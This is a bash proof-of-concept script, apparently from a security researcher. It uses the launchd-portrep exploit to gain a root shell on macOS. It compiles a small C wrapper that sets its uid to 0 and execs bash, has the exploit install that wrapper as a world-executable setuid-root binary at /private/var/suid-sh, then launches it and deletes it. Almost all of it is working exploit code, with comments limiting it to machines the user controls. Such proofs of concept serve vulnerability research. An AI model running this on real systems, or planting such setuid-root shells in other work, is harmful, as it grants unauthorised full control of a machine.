#! /bin/bash
#
# launchd-portrep-rootsh.sh
# Brandon Azad
#
# An example using launchd-portrep to get a root shell. Requires developer tools (make and clang).
# Note: the payload installs a world-executable setuid-root binary at /private/var/suid-sh for a
# short time before it is removed; run this only on a machine you control.
#
cd "$( dirname "${BASH_SOURCE[0]}" )"
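# Print a diagnostic and abort the script.
# Arguments: $1 - message, printed after "Error: "
# Outputs:   the message on stderr (not stdout, so it is not mixed into any
#            captured output)
# Returns:   never; exits with status 1
error() {
  printf 'Error: %s\n' "$1" >&2
  exit 1
}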
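# Build the launchd-portrep binary from the repository's Makefile.
make -s || error "Could not build launchd-portrep"

# Setuid wrapper that the exploit payload installs as root. It sets the real and
# effective uid/gid to 0, so the shell starts with uid 0 rather than merely
# euid 0, and execs /bin/bash with an empty environment. The heredoc delimiter
# is quoted so nothing in the C source is subject to shell expansion.
cat << 'EOF' > suid-sh.c || error "Could not write suid-sh.c"
#include <unistd.h>
int main(int argc, char **argv) {
seteuid(0);
setuid(0);
setgid(0);
argv[0] = "/bin/bash";
return execve(argv[0], argv, NULL);
}
EOF
clang suid-sh.c -o suid-sh || error "Failed to compile suid-sh.c to suid-sh"
rm suid-sh.c

TARGET_SHELL="/private/var/suid-sh"
# Command the exploit runs as root. Absolute tool paths are used because PATH in
# that context is not ours; the source path is single-quoted so a checkout
# directory containing spaces still works (the ';' already requires a shell to
# parse this string). Mode 4555 makes the copy setuid-root and executable by
# every local user -- the invoking user must be able to run it and setuid
# requires root ownership, so it cannot be narrowed further without a chown;
# keep its lifetime short instead (see the exec below).
SHELL_COMMAND="$(command -v cp) '$(pwd)/suid-sh' $TARGET_SHELL; $(command -v chmod) 4555 $TARGET_SHELL"

# Refuse to run while sysdiagnose is active; the reason is not stated in this
# script (presumably it interferes with the port replacement -- not verified).
pgrep -q sysdiagnose && error "sysdiagnose is running!"
./launchd-portrep "$SHELL_COMMAND" || error "launchd-portrep failed"
rm suid-sh
[ -f "$TARGET_SHELL" ] || error "Exploit payload failed to create $TARGET_SHELL"

echo "Launching $TARGET_SHELL"
# Remove the setuid binary from inside the root shell, as its first action,
# instead of from a detached one-second timer: this closes the window in which
# any other local user could also run it, and leaves no background root process.
# /bin/rm runs as root (the file is root-owned) and the final exec keeps uid 0,
# giving the same interactive root /bin/bash as before. If this script dies
# before reaching this line, delete $TARGET_SHELL by hand.
exec "$TARGET_SHELL" -c "/bin/rm -f '$TARGET_SHELL'; exec /bin/bash"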